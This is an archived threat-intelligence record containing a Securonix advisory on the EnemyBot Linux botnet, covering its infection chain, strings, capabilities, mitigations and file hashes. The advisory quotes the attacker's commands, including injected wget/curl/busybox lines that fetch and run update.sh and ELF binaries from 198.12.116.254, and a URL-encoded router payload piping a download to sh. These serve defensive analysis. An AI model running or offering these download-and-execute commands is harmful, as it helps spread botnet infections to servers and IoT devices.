{
	"id": "c5a6e459-b658-48c8-96e2-4b32d8a9505a",
	"created_at": "2026-04-06T00:14:09.389053Z",
	"updated_at": "2026-04-10T13:12:50.020123Z",
	"deleted_at": null,
	"sha1_hash": "c100c018278b01cd367d43375ba559f3339bc3c3",
	"title": "Detecting EnemyBot – Securonix Initial Coverage Advisory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 965744,
	"plain_text": "Detecting EnemyBot – Securonix Initial Coverage Advisory\r\nArchived: 2026-04-02 12:10:08 UTC\r\nBy Securonix Threat Labs, Threat Research: Oleg Kolesnikov, Den Iuzvyk, and Tim Peck\r\nIntroduction\r\nOur researchers have identified EnemyBot, a brand new Linux-based botnet. At first glance and by analyzing the\r\ninitial infection, it appears to cover a wide range of devices and platforms. This report covers technical details\r\nincluding its origin and functionality.\r\nInitial Infection\r\n|echo;cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; wget\r\nhttp://198.12.116.254/update.sh -O update.sh; busybox wget http://198.12.116.254/update.sh -O update.sh; curl\r\nhttp://198.12.116.254/update.sh -O update.sh; chm\r\nThe initial infection was identified making a drive-by attempt to /shell at a web server with an interesting payload\r\nattached to the “value” string. We saw several attempts to download an “update.sh” file using different methods:\r\nwget, busybox, and curl. \r\nTaking a closer look at the update.sh script, the malware attempts to download 13 different ELF binaries each\r\ncompiled for different system architectures. The appended architecture type is appended to the end of the name\r\n“enemybot”. Given the wide range of supported architectures, at first glance this botnet should be effective against\r\nLinux-based hosts ranging from servers to IoT devices. \r\nenemybotmips\r\nenemybotmpsl\r\nenemybotsh4\r\nenemybotx86\r\nenemybotarm7\r\nenemyboti686\r\nenemybotppc\r\nenemyboti586\r\nenemybotm68k\r\nenemybotspc\r\nenemybotarm\r\nenemybotarm5\r\nenemybotppc-440fp\r\nEach line of the script attempts to download (again using various methods), set permissions to execute (777),\r\nexecute from /tmp/ and then delete the original ELF binary.\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 1 of 8\n\nwget http://198.12.116.254/folder/enemybotx86 -o enemybotx86; busybox wget\r\nhttp://198.12.116.254/folder/enemybotx86 -o enemybotx86; curl http://198.12.116.254/folder/enemybotx86 -o\r\nenemybotx86; busybox curl http://198.12.116.254/folder/enemybotx86 -o enemybotx86; ftpget -v -u anonymous -\r\np anonymous -P 21 198.12.116.254 enemybotx86 enemybotx86; busybox ftpget -v -u anonymous -p anonymous -\r\nP 21 198.12.116.254 enemybotx86 enemybotx86; chmod 777 enemybotx86; ./enemybotx86; rm -rf enemybotx86\r\nStage 2 – Pulling Back the Curtain\r\nFirst, we’ll take a look at the “enemybotx86” file that is the system architecture that we’re working on as it would\r\nland us the most success when executing it in a sandbox.\r\nAccording to exiftool, the file is indeed a binary executable file in the ELF format (Linux executable).\r\nJust to get a general idea as to what this binary might be doing, we’ll run it against strings and look for anything\r\ninteresting. The word “enemy” appears to pop up again and again, and in one case is hex formatted:\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 2 of 8\n\nSome other noteworthy and rather curious strings include:\r\n/Game/Mods/TheCenter/TheCenter_A1_NearB\r\n/Game/Maps/TheIslandSubMaps/MasterIBLCaptures\r\n/Game/Maps/TheIslandSubMaps/E3_Far_WIP\r\necho -e “\\x65\\x6e\\x65\\x6d\\x79”\r\ncmac=12%%3Aaf%%3Aaa%%3Abb%%3Acc%%3Add\u0026submit_button=status_guestnet.asp%%0A\r\nwget+http%%3A%%2F%%2F198.12.116.254%%2Fupdate.sh+-O-\r\n+%%7C+sh%%0Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%%10%%A6G%%00\u0026cip=192.168.100.1\r\nDetermined we already have a instance running on this system!\r\nBinded and listening on address %d.%d.%d.%d\r\ndecodedshit\r\nwatudoinglookingatdis\r\nLooking for function names, one that stood out was “whatudoinglookingatdis”. Maybe a hello to future\r\nresearchers?\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 3 of 8\n\nScrubbing the file in a decompile, it appears to feature a host of networking options such as port scanners,\r\nTCP/UDP flood options and general system enumeration. Much of the code appears to be encrypted and we\r\nencountered some counter forensics which can make static analysis problematic. \r\nThe EnemyBot malware also appears to have the ability to steal data via HTTP POST, which in our case, the\r\nmalware was sending the data back to the original IP address. \r\nJust by looking at the export names, we definitely get a better understanding as to what this particular botnet is\r\ncapable of. \r\nUpon further analysis, we find some interesting flags which appear to be passed in as arguments. Some of these\r\ninclude Destination IP, Source IP, Destination Port, Source Port, Data Payload, and Packet Count. \r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 4 of 8\n\nThe malware also initiates system checks to determine whether or not the malware is already running. After the\r\ninstance starts there are two possible outputs:\r\n“Determined we already have a instance running…”\r\n“Binded and listen on address %d.%d.%d.%d.\\n”\r\nDynamic Analysis of the EnemyBot malware did not provide anything useful as the malware seems to have killed\r\nitself soon after execution. There appear to be some baked-in counter forensics that kill the application based on\r\ncertain detected process names. \r\nConclusion\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 5 of 8\n\nThe EnemyBot malware appears to follow similar structures and patterns we’ve seen with other common botnets,\r\nwith a few changes. There appears to be strong correlation to that of the LolFMe botnet which contains other\r\nsimilar strings such as “watudoinglookingatdis”. The LolFMe botnet was quite short-lived and was never popular\r\nso it will be interesting to see how far off the ground this particular strain takes us. \r\nBoth LolFMe and Mirai botnets leverage multi-architecture support and RCE as the initial foothold. This was also\r\nthe case for EnemyBot.\r\nMitigation – Securonix Recommendations\r\nSome possible actions are recommended that can potentially help proactively mitigate the impact of the\r\nEnemyBot attacks on your network. \r\nEnsure systems are fully patched and not vulnerable to RCE\r\nPatch IoT devices’ firmware to the latest versions to mitigate external exploitation\r\nEmploy the usage of layer-7 network monitoring and detection to detect common exploits that may\r\nleverage RCE\r\nEnsure that externally exposed network segments are isolated from internal hosts\r\nDisable or limit execution from linux /tmp/ directories\r\nDetection and Indicators of Compromise (IoCs):\r\nFile Name sha256\r\nupdate.sh cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723\r\nenemybotarm\r\n52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf\r\nadb51a8d112590a6fdd02ac8d812b837bbe0fcdd762dba6bbba0bd0b538f9aef\r\nenemybotarm5\r\n498ecf2ce03960a695d4ba92d4d2e6163917686db29393c4b8d8c9d11d19774d\r\n5e56210f15b653e4ea881f25bfa423af4f4c5ee3a7c9386543fde23e0e7169c8\r\nenemybotarm7\r\n7ccffe7a3daa58db665db93f816ab0b5a4e9ce0bc7a2490d885250d267ed4bbc\r\n7635758818ca966288ad10fb3d385c177f8cd5554369eeb28f8b52951004ed89\r\nenemyboti586\r\nf3c4ca5ba23d27a4d297dfef8614b48bbaca6455814d537114f4e6d418f10f47\r\nd9204c9b5018a3028d5c7f966d8c37be9d7d4dd2c5c4cd95cde686cce655c609\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 6 of 8\n\nenemyboti686\r\nae9cc1b644ee435bddc57af2eeab05fb0ba0dc2f81473611bd2f39c1d9be1d1c\r\nd0b9e7bbf034e501872ecb276b3b670ae175fff09618d9836356d47f677bdbbc\r\nenemybotm68k\r\n5dba7e81c4a03eedee4a33535cfda88d8d178658d0e434ee48bd29d7091c63b5\r\ne4bdf0d87db133824ff183c28c860c08794394eaaf76898899cbeb5f9749ae1f\r\nenemybotmips\r\n22db83f9cc631eb3222444328289a3be787c3a8182ccd8004c6cc2b5dc50a12d\r\naeb9f6999fdc3a3dadbe93ff8a1a2de3ac181b43eddcf208c018db88526b5314\r\nenemybotmpsl\r\nc275a1ec95142b7134d7beb153e6126bda9087c152e69497f1990c39d5045399\r\n6dbb0e96180d0946ddd9ff17908cf830fbff5016ff013891e3fdf3c3b33ef2e6\r\nenemybotppc\r\nea2ff0c01629bdaecceecc59d93de73f01b7b18146986be114503c086fa29976\r\n7ec1fab277b86e022819c9b5a53be05df2af76c5c19b2aa1cf26590d06dcdbcd\r\nenemybotppc-440fp\r\n908a95c887d4c46e5058db09e85efba023219793b54b5cd7ea03e1b450784111\r\na33145dc629c7ca76dc5ec0138fe60b06e8c53bd01f1bb90d9a7e21ff0a391e6\r\nenemybotsh4\r\n9bb46cfa321d5aa65960fa4563a50eec40de4e221e360162bae4b4e4b40a3540\r\n058d36172d25e7b3db227c02ffba5be3d1b17d0eef7bfd4029c55b16ac2ab06b\r\nenemybotspc\r\nf36ade94ba4261fdff37d53c7d7c4935374d9263ec4fe92d2bb6c1def5f0783f\r\nb2c92609557eaabe108689a17996befeabb48da70053ae6335a1fcd0c1189249\r\nenemybotx86\r\n1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50\r\n12e907fae4427a7b0d68adfb33a5e045971bd755f8b7a48299a27736c24c9929\r\nIP Communication observed:\r\n198.12.116.254\r\nPlease look out for updates on search queries and detection content from Securonix Threat Labs\r\nWe also invite you to send your questions regarding any security advisories to the Securonix Critical Intelligence\r\nAdvisory team and look forward to being of assistance.\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 7 of 8\n\nSource: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/"
	],
	"report_names": [
		"detecting-the-enemybot-botnet-advisory"
	],
	"threat_actors": [],
	"ts_created_at": 1775434449,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.pdf",
		"text": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.txt",
		"img": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.jpg"
	}
}